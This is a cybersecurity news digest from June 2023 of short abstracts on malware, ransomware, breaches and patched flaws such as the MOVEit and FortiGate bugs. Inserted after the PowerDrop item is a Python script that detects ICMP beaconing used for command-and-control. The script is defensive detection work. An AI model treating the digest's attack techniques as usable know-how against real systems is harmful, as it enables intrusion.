Abstract A fully undetectable (FUD) malware obfuscation engine named  BatCloak  is being used to deploy various malware strains since September 2022, while persistently evading antivirus detection. The samples grant "threat actors the ability to load numerous malware families and exploits with ease through highly obfuscated batch files," Trend Micro researchers  said . About 79.6% of the total 784 artifacts unearthed have no detection across all security solutions, the cybersecurity firm added, highlighting BatCloak's ability to circumvent traditional detection mechanisms. The BatCloak engine forms the crux of an off-the-shelf batch file builder tool called Jlaive, which comes with capabilities to bypass Antimalware Scan Interface ( AMSI ) as well as compress and encrypt the primary payload to achieve heightened security evasion. The open-source tool, although taken down since it was made available via GitHub and GitLab in September 2022 by a developer named ch2sh, has been

The Hacker News

June 12, 2023 – Vulnerabilities

Fortinet urges to patch a critical RCE flaw in Fortigate firewalls Full Text

Abstract Fortinet released security updates to fix a critical security flaw in its FortiGate firewalls that could lead to remote code execution. Fortinet has released security patches to address a critical security vulnerability, tracked as CVE-2023-27997,...

Security Affairs

June 12, 2023 – Policy and Law

Russian nationals accused of Mt. Gox bitcoin heist, shifting stolen funds to BTC-e Full Text

Abstract The DOJ unsealed charges filed in 2019 against 43-year-old Alexey Bilyuchenko and 29-year-old Aleksandr Verner, accusing the two of stealing 647,000 BTC from Mt. Gox and using it to underpin illicit cryptocurrency exchange BTC-e from 2011 to 2017.

Cyware

June 12, 2023 – Breach

Password Reset Hack Exposed in Honda’s E-Commerce Platform, Dealers Data at Risk Full Text

Abstract Security vulnerabilities discovered in Honda's e-commerce platform could have been exploited to gain unrestricted access to sensitive dealer information. "Broken/missing access controls made it possible to access all data on the platform, even when logged in as a test account," security researcher Eaton Zveare  said  in a report published last week. The  platform  is designed for the sale of power equipment, marine, lawn and garden businesses. It does not impact the Japanese company's automobile division. The hack, in a nutshell, exploits a password reset mechanism on one of Honda's sites, Power Equipment Tech Express (PETE), to reset the password associated with any account and obtain full admin-level access. This is made possible due to the fact that the API allows any user to send a password reset request simply by just knowing the username or email address and without having to enter a password tied to that account. Armed with this capability, a malicio

The Hacker News

June 12, 2023 – Breach

Xplain data breach also impacted the national Swiss railway FSS Full Text

Abstract The Play ransomware attack suffered by the IT services provider Xplain also impacted the national railway company of Switzerland (FSS) and the canton of Aargau. The Play ransomware attack suffered by the IT services provider Xplain is worse than initially...

Security Affairs

June 12, 2023 – Cryptocurrency

Beware: 1,000+ Fake Cryptocurrency Sites Trap Users in Bogus Rewards Scheme Full Text

Abstract A previously undetected cryptocurrency scam has leveraged a constellation of over 1,000 fraudulent websites to ensnare users into a bogus rewards scheme since at least January 2021. "This massive campaign has likely resulted in thousands of people being scammed worldwide," Trend Micro researchers  said  in a report published last week, linking it to a Russian-speaking threat actor named "Impulse Team." "The scam works via an advanced fee fraud that involves tricking victims into believing that they've won a certain amount of cryptocurrency. However, to get their rewards, the victims would need to pay a small amount to open an account on their website." The compromise chain starts with a direct message propagated via Twitter to lure potential targets into visiting the decoy site. The account responsible for sending the messages has since been closed. The message urges recipients to sign up for an account on the website and apply a promo code specif

The Hacker News

June 12, 2023 – Vulnerabilities

Critical RCE Flaw Discovered in Fortinet FortiGate Firewalls - Patch Now! Full Text

Abstract Fortinet has released patches to address a critical security flaw in its FortiGate firewalls that could be abused by a threat actor to achieve remote code execution. The vulnerability, tracked as CVE-2023-27997, is "reachable pre-authentication, on every SSL VPN appliance," Lexfo Security researcher Charles Fol, who discovered and reported the flaw alongside Dany Bach, said in a tweet over the weekend. Details about the security flaw are currently withheld and Fortinet is yet to release an advisory, although the network security company is expected to publish more details in the coming days. French cybersecurity company Olympe Cyberdefense, in an independent alert, said the issue has been patched in versions 6.2.15, 6.4.13, 7.0.12, and 7.2.5. "The flaw would allow a hostile agent to interfere via the VPN, even if the MFA is activated," the firm noted. With Fortinet flaws emerging as a lucrative attack vector for threat actors in recent years, it

The Hacker News

June 12, 2023 – Privacy

Apple’s Safari Private Browsing Now Automatically Removes Tracking Parameters in URLs Full Text

Abstract Apple is introducing major updates to  Safari Private Browsing , offering users better protections against third-party trackers as they browse the web. "Advanced tracking and fingerprinting protections go even further to help prevent websites from using the latest techniques to track or identify a user's device," the iPhone maker  said . "Private Browsing now locks when not in use, allowing a user to keep tabs open even when stepping away from the device." The privacy improvements were previewed at Apple's annual Worldwide Developers Conference (WWDC) last week. They are expected to be rolled out to users as part of iOS 17, iPadOS 17, and macOS Sonoma later this year. Another key change includes Link Tracking Protection in Mail, Messages, and Safari's private mode to automatically remove  tracking parameters  in URLs, which are often used to track information about a click. "Safari has been a somewhat unheralded pioneer of private browsing, a

The Hacker News

June 11, 2023 – Phishing

Microsoft warns of multi-stage AiTM phishing and BEC attacks Full Text

Abstract Microsoft researchers warn of banking adversary-in-the-middle (AitM) phishing and BEC attacks targeting banking and financial organizations. Microsoft discovered multi-stage adversary-in-the-middle (AiTM) phishing and business email compromise (BEC)...

Security Affairs

June 11, 2023 – General

Security Affairs newsletter Round 423 by Pierluigi Paganini – International edition Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Experts...

Security Affairs

June 11, 2023 – Attack

Pro-Ukraine Cyber Anarchy Squad claims the hack of the Russian telecom provider Infotel JSC Full Text

Abstract Pro-Ukraine hackers Cyber Anarchy Squad claimed responsibility for the attack that hit Russian telecom provider Infotel JSC. Pro-Ukraine hacking group Cyber.Anarchy.Squad claimed responsibility for an attack on Russian telecom provider Infotel JSC....

Security Affairs

June 10, 2023 – Malware

New SPECTRALVIPER Backdoor Targeting Vietnamese Public Companies Full Text

Abstract Vietnamese public companies have been targeted as part of an ongoing campaign that deploys a novel backdoor called  SPECTRALVIPER . "SPECTRALVIPER is a heavily obfuscated, previously undisclosed, x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, and token impersonation capabilities," Elastic Security Labs  said  in a Friday report. The attacks have been attributed to an actor it tracks as REF2754, which overlaps with a Vietnamese threat group known as APT32, Canvas Cyclone (formerly Bismuth), Cobalt Kitty, and OceanLotus. Meta, in December 2020,  linked the activities  of the hacking crew to a cybersecurity company named CyberOne Group. In the latest infection flow unearthed by Elastic, the SysInternals  ProcDump  utility is leveraged to load an unsigned DLL file that contains DONUTLOADER, which, in turn, is configured to load SPECTRALVIPER and other malware such as P8LOADER or POWERSEAL. SPECTRALVIPER is desi

The Hacker News

June 10, 2023 – Vulnerabilities

Experts found new MOVEit Transfer SQL Injection flaws Full Text

Abstract Progress Software released security updates to fix several new SQL injection vulnerabilities in the MOVEit Transfer application. Progress Software has released security updates to address new SQL injection vulnerabilities in the MOVEit Transfer application. An...

Security Affairs

June 10, 2023 – Breach

The University of Manchester suffered a cyber attack and suspects a data breach Full Text

Abstract The University of Manchester suffered a cyberattack; attackers likely stole staff and students' data from its systems. The University of Manchester, one of the UK's largest educational institutions, suffered a cyberattack. The popular university suspects...

Security Affairs

June 10, 2023 – Vulnerabilities

Easily Exploitable Microsoft Visual Studio Bug Opens Developers to Takeover Full Text

Abstract Security researchers are warning about a bug in the Microsoft Visual Studio installer that gives cyberattackers a way to create and distribute malicious extensions to application developers, under the guise of being a legitimate software publisher.

Cyware

June 10, 2023 – Vulnerabilities

New Critical MOVEit Transfer SQL Injection Vulnerabilities Discovered - Patch Now! Full Text

Abstract Progress Software, the company behind the MOVEit Transfer application, has released patches to address brand new SQL injection vulnerabilities affecting the file transfer solution that could enable the theft of sensitive information. "Multiple SQL injection vulnerabilities have been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database," the company  said  in an advisory released on June 9, 2023. "An attacker could submit a crafted payload to a MOVEit Transfer application endpoint which could result in modification and disclosure of MOVEit database content." The flaws, which impact all versions of the service, have been addressed in MOVEit Transfer versions 2021.0.7 (13.0.7), 2021.1.5 (13.1.5), 2022.0.5 (14.0.5), 2022.1.6 (14.1.6), and 2023.0.2 (15.0.2). All  MOVEit Cloud instances  have been fully patched. Cybersecurity firm Huntress has been  credited  with d

The Hacker News

June 9, 2023 – Policy and Law

Russians charged with hacking Mt. Gox exchange and operating BTC-e Full Text

Abstract Two Russian nationals have been charged with the hack of the cryptocurrency exchange Mt. Gox in 2011 and money laundering. Russian nationals Alexey Bilyuchenko (43) and Aleksandr Verner (29) have been charged with the hack of the cryptocurrency exchange...

Security Affairs

June 9, 2023 – Business

Blackpoint Cyber raises $190 million to fund further development of its security technology Full Text

Abstract The $190 million growth investment was led by Bain Capital Tech Opportunities, with participation from Accel. They join existing investors including Adelphi Capital Partners, Telecom Ventures, Pelican Ventures, and WP Global Partners.

Cyware

June 09, 2023 – Phishing

Microsoft Uncovers Banking AitM Phishing and BEC Attacks Targeting Financial Giants Full Text

Abstract Banking and financial services organizations are the targets of a new multi-stage adversary-in-the-middle ( AitM ) phishing and business email compromise (BEC) attack, Microsoft has revealed. "The attack originated from a compromised trusted vendor and transitioned into a series of AiTM attacks and follow-on BEC activity spanning multiple organizations," the tech giant  disclosed  in a Thursday report. Microsoft, which is tracking the cluster under its emerging moniker  Storm-1167 , called out the group's use of indirect proxy to pull off the attack. This enabled the attackers to flexibly tailor the phishing pages to their targets and carry out session cookie theft, underscoring the continued sophistication of AitM attacks. The modus operandi is unlike other AitM campaigns where the decoy pages act as a  reverse proxy  to harvest credentials and time-based one-time passwords (TOTPs) entered by the victims. "The attacker presented targets with a website that mi

The Hacker News

June 9, 2023 – Outage

Japanese Pharmaceutical giant Eisai hit by a ransomware attack Full Text

Abstract This week, the Japanese pharmaceutical giant Eisai has taken its systems offline in response to a ransomware attack. Eisai is a Japanese pharmaceutical company with about 10,000 employees and more than $5 billion in revenue. The company this week...

Security Affairs

June 9, 2023 – General

Employee cybersecurity awareness takes center stage in defense strategies Full Text

Abstract The latest research from Fortinet reveals that more than 90% of leaders believe that increased employee cybersecurity awareness would help decrease the occurrence of cyberattacks.

Cyware

June 09, 2023 – Criminals

Asylum Ambuscade: A Cybercrime Group with Espionage Ambitions Full Text

Abstract The threat actor known as  Asylum Ambuscade  has been observed straddling cybercrime and cyber espionage operations since at least early 2020. "It is a crimeware group that targets bank customers and cryptocurrency traders in various regions, including North America and Europe," ESET  said  in an analysis published Thursday. "Asylum Ambuscade also does espionage against government entities in Europe and Central Asia." Asylum Ambuscade was  first documented  by Proofpoint in March 2022 as a nation-state-sponsored phishing campaign that targeted European governmental entities in an attempt to obtain intelligence on refugee and supply movement in the region. The goal of the attackers, per the Slovak cybersecurity firm, is to siphon confidential information and web email credentials from official government email portals. The attacks start off with a spear-phishing email bearing a malicious Excel spreadsheet attachment that, when opened, either exploits VBA code o

The Hacker News

June 9, 2023 – Criminals

Clop ransomware gang was testing MOVEit Transfer bug since 2021 Full Text

Abstract Researchers discovered that the Clop ransomware gang had been looking for a zero-day exploit in MOVEit Transfer since 2021. Kroll security experts discovered that the Clop ransomware gang was looking for a zero-day exploit in MOVEit Transfer since...

Security Affairs

June 9, 2023 – Attack

University of Manchester Announces Cyber Incident, Says Data ‘Likely’ Copied Full Text

Abstract The University of Manchester, one of the largest universities in the United Kingdom by enrollment, announced on Friday that it was the victim of a cyber incident and that the hackers had accessed and “likely” copied data.

Cyware

June 09, 2023 – General

5 Reasons Why Access Management is the Key to Securing the Modern Workplace Full Text

Abstract The way we work has undergone a dramatic transformation in recent years. We now operate within digital ecosystems, where remote work and the reliance on a multitude of digital tools is the norm rather than the exception. This shift – as you likely know from your own life – has led to superhuman levels of productivity that we wouldn't ever want to give up. But moving fast comes at a cost. And for our digital work environment, that cost is security.  Our desire for innovation, speed and efficiency has birthed new and complex security challenges that all in some way or another revolve around securing how we access resources. Because of this, effective access management now plays a more critical role in securing the modern workplace than ever. Follow along as we uncover five reasons why this is the case. Educating People About Security is Not Working For years, we've held the belief that educating people about cyberthreats would make them more cautious online. Yet, despite 17 y

The Hacker News

June 9, 2023 – Malware

Stealth Soldier backdoor used in targeted espionage attacks in Libya Full Text

Abstract Researchers detected a cyberespionage campaign in Libya that employs a new custom, modular backdoor dubbed Stealth Soldier. Experts at the Check Point Research team uncovered a series of highly-targeted espionage attacks in Libya that employ a new custom...

Security Affairs

June 09, 2023 – Malware

Stealth Soldier: A New Custom Backdoor Targets North Africa with Espionage Attacks Full Text

Abstract A new custom backdoor dubbed  Stealth Soldier  has been deployed as part of a set of highly-targeted espionage attacks in North Africa. "Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information," cybersecurity company Check Point  said  in a technical report. The ongoing operation is characterized by the use of command-and-control (C&C) servers that mimic sites belonging to the Libyan Ministry of Foreign Affairs. The earliest artifacts associated with the campaign date back to October 2022. The attacks commence with potential targets downloading bogus downloader binaries that are delivered via social engineering attacks and act as a conduit for retrieving Stealth Soldier, while simultaneously displaying a decoy empty PDF file. The custom modular implant, which is believed to be used sparingly, enables surveillance c

The Hacker News

June 8, 2023 – Attack

Aix-Marseille, France’s largest university, hit by cyberattack Full Text

Abstract The institution’s management described the attack as coming “from a foreign country” but said its security systems triggered an alert allowing them to take the network offline before “great damage” was caused.

Cyware

June 08, 2023 – Vulnerabilities

Experts Unveil Exploit for Recent Windows Vulnerability Under Active Exploitation Full Text

Abstract Details have emerged about a now-patched, actively exploited security flaw in Microsoft Windows that could be abused by a threat actor to gain elevated privileges on affected systems. The vulnerability, tracked as CVE-2023-29336, is rated 7.8 for severity and concerns an elevation of privilege bug in the Win32k component. "An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," Microsoft disclosed in an advisory issued last month as part of Patch Tuesday updates. Avast researchers Jan Vojtěšek, Milánek, and Luigino Camastra were credited with discovering and reporting the flaw. Win32k.sys is a kernel-mode driver and an integral part of the Windows architecture, being responsible for graphical device interface (GUI) and window management. While the exact specifics surrounding in-the-wild abuse of the flaw are presently not known, Numen Cyber has deconstructed the patch released by Microsoft to craft a proof-of-concept ( PoC ) exploit

The Hacker News

June 8, 2023 – Vulnerabilities

Researchers published PoC exploit code for actively exploited Windows elevation of privilege issue Full Text

Abstract Researchers published an exploit for an actively exploited Microsoft Windows vulnerability tracked as CVE-2023-29336. The Microsoft Windows vulnerability CVE-2023-29336 (CVSS score 7.8) is an elevation of privilege issue that resides in the Win32k...

Security Affairs

June 8, 2023 – Vulnerabilities

Security professional’s tweet forces big change to Google email authentication Full Text

Abstract Less than a month after BIMI’s roll-out, scammers found a way around its controls and were able to successfully impersonate brands, sending emails to Google users that impersonated the logistics giant UPS.

Cyware

June 08, 2023 – Government

Clop Ransomware Gang Likely Aware of MOVEit Transfer Vulnerability Since 2021 Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have published a joint advisory regarding the active exploitation of a  recently disclosed critical flaw  in Progress Software's MOVEit Transfer application to drop ransomware. "The Cl0p Ransomware Gang, also known as TA505, reportedly began exploiting a previously unknown SQL injection vulnerability in Progress Software's managed file transfer (MFT) solution known as MOVEit Transfer," the agencies  said . "Internet-facing MOVEit Transfer web applications were infected with a web shell named LEMURLOOT, which was then used to steal data from underlying MOVEit Transfer databases." The prolific cybercrime gang has since  issued an ultimatum  to several impacted businesses, urging them to get in touch by June 14, 2023, or risk getting all their stolen data published. Microsoft is tracking the activity under the moniker  Lace Tempest  (aka Storm-0950),

The Hacker News

June 8, 2023 – APT

Experts detail a new Kimsuky social engineering campaign Full Text

Abstract North Korea-linked APT Kimsuky has been linked to a social engineering campaign aimed at experts in North Korean affairs. SentinelLabs researchers uncovered a social engineering campaign by the North Korea-linked APT group Kimsuky that is targeting...

Security Affairs

June 8, 2023 – Criminals

Asylum Ambuscade: crimeware or cyberespionage? Full Text

Abstract The group targets bank customers and cryptocurrency traders in various regions, including North America and Europe, as well as government entities in Europe and Central Asia.

Cyware

June 08, 2023 – Education

How to Improve Your API Security Posture Full Text

Abstract APIs, more formally known as application programming interfaces, empower apps and microservices to communicate and share data. However, this level of connectivity doesn't come without major risks. Hackers can exploit vulnerabilities in APIs to gain unauthorized access to sensitive data or even take control of the entire system. Therefore, it's essential to have a robust API security posture to protect your organization from potential threats. What is API posture management? API posture management refers to the process of monitoring and managing the security posture of your APIs. It involves identifying potential vulnerabilities and misconfigurations that could be exploited by attackers, and taking the necessary steps to remediate them. Posture management also helps organizations classify sensitive data and ensure that it's compliant with the leading data compliance regulations such as GDPR, HIPAA, and PCI DSS.  As mentioned above, APIs are a popular target for attackers

The Hacker News

June 8, 2023 – Breach

German recruiter Pflegia leaks sensitive job seeker info Full Text

Abstract Pflegia, a German healthcare recruitment platform, has exposed hundreds of thousands of files with sensitive user data such as names, home addresses, and emails. Scouting for a new career can be stressful. Now imagine that, instead of a new role,...

Security Affairs

June 8, 2023 – Breach

German Recruiter Pflegia Leaks 360,000 Files Containing Sensitive Job Seeker Information Full Text

Abstract The exposed AWS bucket held hundreds of thousands of files with sensitive information, including user-submitted resumes with details such as full names, dates of birth, and occupation history.

Cyware

June 08, 2023 – Vulnerabilities

Urgent Security Updates: Cisco and VMware Address Critical Vulnerabilities Full Text

Abstract VMware has  released  security updates to fix a trio of flaws in Aria Operations for Networks that could result in information disclosure and remote code execution. The most critical of the three vulnerabilities is a command injection vulnerability tracked as  CVE-2023-20887  (CVSS score: 9.8) that could allow a malicious actor with network access to achieve remote code execution. Also patched by VMware is another  deserialization vulnerability  ( CVE-2023-20888 ) that's rated 9.1 out of a maximum of 10 on the CVSS scoring system. "A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution," the company said in an advisory. The third security defect is a high-severity information disclosure bug ( CVE-2023-20889 , CVSS score: 8.8) that could permit an actor with network access to perform a command injection attack and obtain

The Hacker News

June 8, 2023 – Vulnerabilities

Cisco fixes privilege escalation bug in Cisco Secure Client Full Text

Abstract Cisco addressed a high-severity flaw in Cisco Secure Client that can allow attackers to escalate privileges to the SYSTEM account. Cisco has fixed a high-severity vulnerability, tracked as CVE-2023-20178 (CVSS Score 7.8), found in Cisco Secure Client...

Security Affairs

June 8, 2023 – Breach

API Vulnerabilities in Honda eCommerce Platform Exposed Customer, Dealer Data Full Text

Abstract A researcher has disclosed the details of serious vulnerabilities discovered in a Honda e-commerce platform used for equipment sales. Exploitation of the flaws could have allowed an attacker to gain access to customer and dealer information.

Cyware

June 08, 2023 – Attack

Kimsuky Targets Think Tanks and News Media with Social Engineering Attacks Full Text

Abstract The North Korean nation-state threat actor known as  Kimsuky  has been linked to a social engineering campaign targeting experts in North Korean affairs with the goal of stealing Google credentials and delivering reconnaissance malware. "Further, Kimsuky's objective extends to the theft of subscription credentials from NK News," cybersecurity firm SentinelOne  said  in a report shared with The Hacker News. "To achieve this, the group distributes emails that lure targeted individuals to log in on the malicious website nknews[.]pro, which masquerades as the authentic NK News site. The login form that is presented to the target is designed to capture entered credentials." NK News , established in 2011, is an American subscription-based news website that provides stories and analysis about North Korea. The disclosure comes days after U.S. and South Korean intelligence agencies  issued an alert  warning of Kimsuky's use of social engineering tactics to strik

The Hacker News

June 8, 2023 – Vulnerabilities

Barracuda ESG appliances impacted by CVE-2023-2868 must be immediately replaced Full Text

Abstract Barracuda warns customers to immediately replace Email Security Gateway (ESG) appliances impacted by the flaw CVE-2023-2868. At the end of May, the network security solutions provider Barracuda warned customers that some of its Email Security Gateway...

Security Affairs

June 8, 2023 – Breach

Ascension Seton Reports Data Breach of Two Websites Impacting User Information Full Text

Abstract Ascension Seton said it did not have specific details about what information had been affected but that some users’ personal details, such as name, address, SSNs, credit card numbers, and insurance information may be at risk.

Cyware

June 08, 2023 – Vulnerabilities

Barracuda Urges Immediate Replacement of Hacked ESG Appliances Full Text

Abstract Enterprise security company Barracuda is now urging customers who were impacted by a recently disclosed zero-day flaw in its Email Security Gateway (ESG) appliances to immediately replace them. "Impacted ESG appliances must be immediately replaced regardless of patch version level," the company said in an update, adding its "remediation recommendation at this time is full replacement of the impacted ESG." The latest development comes as Barracuda disclosed that a critical flaw in the devices (CVE-2023-2868, CVSS score: 9.8) has been exploited as a zero-day for at least seven months since October 2022 to deliver bespoke malware and steal data. The vulnerability concerns a case of remote code injection affecting versions 5.1.3.001 through 9.2.0.006 that stems from an incomplete validation of attachments contained within incoming emails. It was addressed on May 20 and May 21, 2023. The three different malware families discovered to date come with capabiliti

The Hacker News

June 8, 2023 – Business

Cyber unicorn Snyk acquiring Israeli startup Enso Security for over $50 million Full Text

Abstract Snyk said it plans to leverage Enso’s Application Security Posture Management (ASPM) solution to offer a developer security platform providing a holistic view of application security posture.

Cyware

June 8, 2023 – Vulnerabilities

Cisco Patches Critical Vulnerability in Enterprise Collaboration Solutions Full Text

Abstract Cisco on Wednesday announced patches for a critical vulnerability in its Expressway series and TelePresence Video Communication Server (VCS) enterprise collaboration and video communication solutions.

Cyware

June 7, 2023 – Government

US, Israel Provide Guidance on Securing Remote Access Software Full Text

Abstract The Guide to Securing Remote Access Software (PDF) is authored by the CISA, the FBI, the NSA, the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Israel National Cyber Directorate (INCD).

Cyware

June 07, 2023 – Policy and Law

Microsoft to Pay $20 Million Penalty for Illegally Collecting Kids’ Data on Xbox Full Text

Abstract Microsoft has agreed to pay a penalty of $20 million to settle U.S. Federal Trade Commission (FTC) charges that the company illegally collected and retained the data of children who signed up to use its Xbox video game console without their parents' knowledge or consent. "Our proposed order makes it easier for parents to protect their children's privacy on Xbox, and limits what information Microsoft can collect and retain about kids," FTC's Samuel Levine said. "This action should also make it abundantly clear that kids' avatars, biometric data, and health information are not exempt from COPPA." As part of the proposed settlement, which is pending court approval, Redmond has been ordered to update its account creation process for children to prevent the collection and storage of data, including obtaining parental consent and deleting said information within two weeks if approval is not obtained. The privacy protections also extend to third-par

The Hacker News

June 7, 2023 – Government

The National Cybersecurity Strategy: Breaking a 50-Year Losing Streak Full Text

Abstract The new White House strategy tackles long-standing cybersecurity problems head-on.

Lawfare

June 7, 2023 – Vulnerabilities

VMware fixes a command injection flaw CVE-2023-20887 in VMware Aria Operations for Networks Full Text

Abstract Virtualization giant VMware addressed critical and high-severity vulnerabilities in VMware Aria Operations for Networks. Virtualization technology giant VMware released security patches to address three critical and high-severity vulnerabilities,...

Security Affairs

June 7, 2023 – General

Traditional malware increasingly takes advantage of ChatGPT for attacks Full Text

Abstract “Between November 2022-April 2023, we noticed a 910% increase in monthly registrations for domains, both benign and malicious, related to ChatGPT,” according to the latest Network Threat Trends Research Report from Palo Alto Networks' Unit 42.

Cyware

June 07, 2023 – Education

Winning the Mind Game: The Role of the Ransomware Negotiator Full Text

Abstract Get exclusive insights from a real ransomware negotiator who shares authentic stories from network hostage situations and how he managed them. The Ransomware Industry Ransomware is an industry. As such, it has its own business logic: organizations pay money, in crypto-currency, in order to regain control over their systems and data. This industry's landscape is made up of approximately 10-20 core threat actors who originally developed the ransomware's malware. To distribute the malware, they work with affiliates and distributors who utilize widespread phishing attacks to breach organizations. Profits are distributed with approximately 70% allocated to the affiliates and 10%-30% to these developers. The use of phishing renders online-based industries, like gaming, finance and insurance, especially vulnerable. In addition to its financial motivations, the ransomware industry is also influenced by geopolitics. For example, in June 2021, following the ransomware

The Hacker News

June 7, 2023 – General

A Path Forward for Israel Following the NSO Scandal Full Text

Abstract How can Israel rebuild national and international trust in its cyber industry, and are the steps it’s currently taking enough?

Lawfare

June 7, 2023 – Criminals

Clop ransomware gang claims the hack of hundreds of victims exploiting MOVEit Transfer bug Full Text

Abstract Clop ransomware group claims to have hacked hundreds of companies globally by exploiting MOVEit Transfer vulnerability. The Clop ransomware group may have compromised hundreds of companies worldwide by exploiting a vulnerability in MOVEit Transfer...

Security Affairs

June 7, 2023 – Criminals

0mega ransomware gang changes tactics Full Text

Abstract A number of ransomware gangs have stopped using malware to encrypt targets’ files and have switched to a data theft/extortion approach to get paid; 0mega – a low-profile and seemingly not very active threat actor – seems to be among them.

Cyware

June 07, 2023 – Malware

New PowerDrop Malware Targeting U.S. Aerospace Industry Full Text

Abstract An unknown threat actor has been observed targeting the U.S. aerospace industry with a new PowerShell-based malware called PowerDrop. "PowerDrop uses advanced techniques to evade detection such as deception, encoding, and encryption," according to Adlumin, which found the malware implanted in an unnamed domestic aerospace defense contractor in May 2023. "The name is derived from the tool, Windows PowerShell, used to concoct the script, and 'Drop' from the DROP (DRP) string used in the code for padding." PowerDrop is also a post-exploitation tool, meaning it's designed to gather information from victim networks after obtaining initial access through other means. The malware employs Internet Control Message Protocol (ICMP) echo request messages as beacons to initiate communications with a command-and-control (C2) server. The server, for its part, responds back with an encrypted command that's decoded and run on the compromised host. A similar
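The abstract above describes the C2 channel, not how to spot it. The following is an added example (not Adlumin's code and not PowerDrop's) of the detection logic a defender would run over ICMP telemetry: group echo requests by source/destination pair and flag pairs whose inter-arrival times are nearly constant, then raise the score when the payload size is not one the stock ping utilities send. The sample records, the 60-second interval, the jitter threshold and the default-payload allowlist (32 bytes for Windows ping.exe, 56 for Linux/BSD ping) are all assumptions for this demonstration.

```python
from collections import defaultdict
from statistics import mean, pstdev

ECHO_REQUEST = 8  # ICMP type for echo request

# Assumption: payload sizes the common ping tools send by default. Anything else
# on a periodic channel is worth a look.
DEFAULT_PING_PAYLOADS = {32, 56}

# Constructed sample records: (unix_ts, src, dst, icmp_type, payload_len). Not real traffic.
SAMPLE_ICMP = (
    # host A: four ordinary Windows pings to the gateway, one second apart
    [(1000.0 + i, "10.0.0.5", "10.0.0.1", 8, 32) for i in range(4)]
    # host B: echo requests to one external host every ~60 s with little jitter and
    # an unusual payload size, the shape a beaconing implant would leave
    + [(2000.0 + 60 * i + (0.3 if i % 2 else -0.2), "10.0.0.23", "203.0.113.9", 8, 128)
       for i in range(8)]
    # host C: irregular echo requests to a monitoring box (should not be flagged)
    + [(3000.0, "10.0.0.7", "10.0.0.50", 8, 56), (3017.0, "10.0.0.7", "10.0.0.50", 8, 56),
       (3120.0, "10.0.0.7", "10.0.0.50", 8, 56), (3122.0, "10.0.0.7", "10.0.0.50", 8, 56),
       (3400.0, "10.0.0.7", "10.0.0.50", 8, 56), (3401.0, "10.0.0.7", "10.0.0.50", 8, 56)]
)


def find_icmp_beacons(records, min_count=6, max_jitter=0.1):
    """Return candidate beacons: (src, dst) pairs with at least `min_count` echo
    requests whose inter-arrival coefficient of variation is below `max_jitter`."""
    by_pair = defaultdict(list)
    for ts, src, dst, icmp_type, plen in records:
        if icmp_type == ECHO_REQUEST:
            by_pair[(src, dst)].append((ts, plen))

    findings = []
    for (src, dst), pkts in by_pair.items():
        if len(pkts) < min_count:
            continue
        pkts.sort()
        gaps = [b[0] - a[0] for a, b in zip(pkts, pkts[1:])]
        if len(gaps) < 2:
            continue
        avg = mean(gaps)
        if avg <= 0:
            continue
        jitter = pstdev(gaps) / avg  # coefficient of variation of the interval
        if jitter > max_jitter:
            continue
        sizes = {plen for _, plen in pkts}
        reasons = ["%d echo requests every ~%.1fs (CV %.3f)" % (len(pkts), avg, jitter)]
        if not sizes <= DEFAULT_PING_PAYLOADS:
            reasons.append("non-default payload sizes %s" % sorted(sizes))
        findings.append({"src": src, "dst": dst, "count": len(pkts),
                         "interval": round(avg, 1), "reasons": reasons})
    return sorted(findings, key=lambda f: f["src"])


if __name__ == "__main__":
    for f in find_icmp_beacons(SAMPLE_ICMP):
        print(f["src"], "->", f["dst"], "; ".join(f["reasons"]))
```

Periodic ICMP from legitimate monitoring will also match the interval test, which is why the payload-size check is kept as a separate reason rather than folded into the threshold; tune `min_count` and `max_jitter` against your own baseline before alerting on this.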

The Hacker News

June 7, 2023 – Vulnerabilities

June 2023 Security Update for Android fixed Arm Mali GPU bug used by spyware Full Text

Abstract June 2023 security update for Android released by Google fixes about fifty flaws, including an Arm Mali GPU bug exploited by surveillance firms in their spyware. The June 2023 Android Security Bulletin provides details about the fix for more than...

Security Affairs

June 7, 2023 – Criminals

Clop Ransomware Group Issues Extortion Notice to ‘Hundreds’ of Victims Full Text

Abstract Potentially hundreds of companies globally are being extorted by the Clop ransomware group after it exploited a vulnerability in the file transfer tool MOVEit to break into computer networks around the world and steal sensitive information.

Cyware

June 7, 2023 – Malware

New PowerDrop malware targets U.S. aerospace defense industry Full Text

Abstract A previously unknown threat actor has been observed targeting the U.S. aerospace defense sector with a new PowerShell malware dubbed PowerDrop. Researchers from the Adlumin Threat Research discovered a new malicious PowerShell script, dubbed PowerDrop,...

Security Affairs

June 7, 2023 – General

When adopting security tools, less is more, Gartner says Full Text

Abstract Gartner analysts are calling for organizations to adopt a “minimum effective toolset” for enterprise security, using the fewest technologies required to observe, respond and defend against threats.

Cyware

June 7, 2023 – General

+60,000 Android apps spotted hiding adware for past six months Full Text

Abstract Bitdefender researchers have discovered 60,000 different Android apps secretly installing adware in the past six months. Bitdefender announced the discovery of more than 60,000 Android apps in the past six months that were spotted installing adware...

Security Affairs

June 7, 2023 – General

Public sector apps show higher rates of security flaws Full Text

Abstract The research findings from Veracode come amid a flurry of recent initiatives by the federal government to strengthen cybersecurity, including efforts to reduce vulnerabilities in applications that perform critical government functions.

Cyware

June 7, 2023 – Government

White House critical infrastructure protection order is ‘outdated’ and needs rethinking, Cyberspace Solarium Commission says Full Text

Abstract The document — 2013’s Presidential Policy Directive 21, or PPD-21 — established which agencies were responsible for steering protection of each of the 16 critical infrastructure sectors, today known as sector risk management agencies (SRMAs).

Cyware

June 7, 2023 – Attack

Ukraine Warns Against Cyberespionage Campaign Planting LonePage Malware on Targeted Systems Full Text

Abstract Volodymyr Kondrashov, spokesperson for Ukraine's State Service of Special Communications and Information Protection tweeted Tuesday the campaign targets Microsoft Windows machines used by government agencies and media organizations.

Cyware

June 6, 2023 – Privacy

Apple Unveils Upcoming Privacy and Security Features Full Text

